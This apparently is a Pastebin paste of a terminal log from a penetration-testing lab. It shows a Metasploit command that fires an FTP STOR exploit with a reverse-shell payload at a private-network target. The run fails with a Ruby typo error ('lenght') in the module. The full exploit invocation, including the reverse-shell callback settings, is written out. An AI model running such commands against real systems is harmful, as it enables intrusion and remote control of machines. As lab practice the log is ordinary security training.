Advertisement
Guest User

Untitled

a guest
Jun 11th, 2017
92
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.56 KB | None | 0 0
  1. root@BT4PWN:~/Labs/mod9# msfcli exploit/windows/ftp/ability_stor PAYLOAD=windows/shell_reverse_tcp FTPPASS=ftp FTPUSER=ftp RHOST=192.168.11.31 LHOST=192.168.10.103 LPORT=4321 E
  2. [*] Please wait while we load the module tree...
  3. (eval):17: warning: already initialized constant VERIFY_PEER
  4. [*] Started reverse handler on 192.168.10.103:4321
  5. [*] Connecting to FTP server 192.168.11.31:21...
  6. [*] Connected to target FTP server.
  7. [*] Authenticating as ftp with password ftp...
  8. [*] Sending password...
  9. [-] Exploit exception: undefined method `lenght' for #<String:0xd07f0a8>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement